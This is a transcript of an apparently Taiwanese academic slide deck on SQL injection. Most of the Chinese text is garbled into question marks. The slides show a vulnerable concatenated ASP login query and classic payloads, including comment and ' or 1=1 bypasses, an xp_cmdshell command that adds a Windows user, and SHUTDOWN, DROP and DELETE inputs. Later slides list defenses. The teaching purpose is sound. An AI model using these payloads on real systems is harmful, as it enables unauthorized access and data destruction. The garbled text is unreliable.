SQL Injection (????) ?? - PowerPoint PPT Presentation

1 / 28
About This Presentation
Title:

SQL Injection (????) ??

Description:

Title: Author: flora Last modified by: Created Date: 4/25/2002 3:18:28 AM Document presentation format: – PowerPoint PPT presentation

Number of Views:200
Avg rating:3.0/5.0
Slides: 29
Provided by: flor1167
Category:

less

Transcript and Presenter's Notes

Title: SQL Injection (????) ??


1
SQL Injection (????) ??
??? ??? ?????????? ?????????? URL
http//crypto.ee.ncku.edu.tw Email
peder_at_crypto.ee.ncku.edu.tw
2
??
  • ??
  • ???SQL Injection
  • ?????
  • SQL Injection??
  • SQL Injection??
  • SQL ????
  • ????SQL Injection

3
??
  • ? 1997 ????????????????????
  • ??????????????, 4?23?????SQL Injection???,????????
    ?????SQL?????,??,?????,???????????????????????????
    ???

4
???SQL Injection
  • SQL Injection ??? SQL ???????,????? Input
    Validation ???????????????????
  • SQL Injection???????????,????????????SQL??????????
    ???
  • ???,?????????????,??????????????????,?????????????
    ??

5
(No Transcript)
6
SQL Injection
  • SQL Injection ?????????????????????
  • ???????????,????????????????????
  • ?????????,????????,?????????,????????????????

7
?????
  • Apache?IIS?Domino?Netscape?????,??ASP?PHP?JSP????,
    ??????SQL????
  • ???????MSSQL?MySQL?Oracle?Sybase?DB2??

8
SQL Injection
  • ???????
  • ????????????????
  • ?????????????
  • ????????
  • ???????????????
  • ASP???????

9
ASP????????????????
10
??!
  • ????SQL Injection??????????,??????????????????????
    ,???????????,?????????,???????
  • ?????????????,????????????????,???????????????

11
SQL Injection??
  • ????????????SQL??
  • select from member where UID ' "
    request("ID") " '
  • And Passwd ' " request("Pwd") " '
  • ?????????A123456789 ,??1234
  • select from member where UID 'A123456789' And
    Passwd'1234'
  • ??????????????ASP( or PHP?JSP)????,???????('
    ')???

12
(No Transcript)
13
SQL Injection?? (cont.)
  • select from member where UID ' "
    request("ID") " '
  • And Passwd ' " request("Pwd") " '
  • ?????????????Admin??????,???Admin '--
    ,??????????????
  • select from member where UID ' Admin '-- '
  • And Passwd ' '
  • ? -- ???????????????
  • (?????,And????SQL?????)

14
??????
15
SQL Injection??
16
SQL Injection??(???)
  • ?????????
  • ?????' or 11 --,??asdf1234(????)
  • select from member where UID ' ' or 11 -- '
  • And Passwd 'asdf1234'

17
SQL Injection??(???)
  • ?????????
  • ?????abcdefg (????) ,
  • ??asdf (????) ' or 11 --
  • select from member where UID ' abcdefg '
  • And Passwd ' asdf ' or 11 -- '

18
SQL Injection??(???)
  • SELECT FROM myTable
  • WHERE someText ' " request.form("inputdata")
    " '
  • ??????????
  • ' exec master..xp_cmdshell 'net user test
    testpass /ADD' --
  • SELECT FROM myTable
  • WHERE someText '' exec master..xp_cmdshell 'net
    user test testpass /ADD'-- '
  • ????,???SQL???????????test??(??testpass)

19
SQL Injection??
  • ??????
  • ' SHUTDOWN-- ??SQL???
  • ' DROP Database lt?????gt-- ?????
  • ' DROP Table lt?????gt-- ?????
  • ' DELETE FROM lt?????gt-- ?????
  • ' Truncate Table lt?????gt-- ?????

20
SQL????
  • sa ??
  • sa ???????????????,???????????,??,???????? SQL
    ???????????
  • ????
  • ??????? SQL Server ????????????
  • ????? xp_cmdshell ???????(extended stored
    procedure )??? SQL Server ??????????????????,
    ?????SQL Server??????

21
SQL???? (cont.)
  • db_owner ??
  • ???????????? db_owner ??,?????????????????????????
    ,???????????,?????,???????????
  • ????
  • ??????????????????????
  • ????Table???? Table????????????????

22
SQL???? (cont.)
  • normal user ??????? (????)
  • ????
  • ????????????????????
  • ????????,?????????????
  • ??????, ????????????????????????

23
????SQL Injection
  • ????????
  • ????????????sql??,?INSERT?SELECT?UPDATE?
  • ??????????,????,???????????????????
  • ?????????????,?--? ' ????replace(xx, " ' ", " ' '
    ")????
  • ???????,???????????????????????

24
????SQL Injection (cont.)
  • ???????
  • Sa?????????
  • ??????????(????????)
  • ??????,????????????????,?????????????
  • ?????????????????,?xp_cmdshell ?xp_regaddmultistri
    ng ?xp_unpackcab?

25
????SQL Injection (cont.)
  • ???????
  • ?????????????????
  • ??ASP?PHP?JSP??????,???????????
  • ???????????,?IIS?????????C\Inetpub\WWWRoot\???
  • ???????????
  • ?????????????????????
  • ??????????????
  • ??C\WINNT\Help\iisHelp\common\500-100.asp???????

26
????SQL Injection (cont.)
  • ?????????
  • ??????????port 1433?1434???
  • ???????????????
  • ??Host-based IDS?Application-based IDS??????????

27
????
  • The Open Web Application Security Project
    http//www.owasp.org/asac/input_validation/sql.sht
    ml
  • ????http//www.diamondinfotech.com.tw/
  • ????????http//www.sysware.com.tw/news/press/02042
    4.shtml

28
???? (cont.)
  • ????????SQL Injection?????
  • http//www.microsoft.com/taiwan/sql/SQL_Injection.
    htm
  • http//www.microsoft.com/taiwan/sql/SQL_Injection_
    G1.htm
  • SQL Server????http//www.sqlserver.com.tw/
Write a Comment
User Comments (0)
About PowerShow.com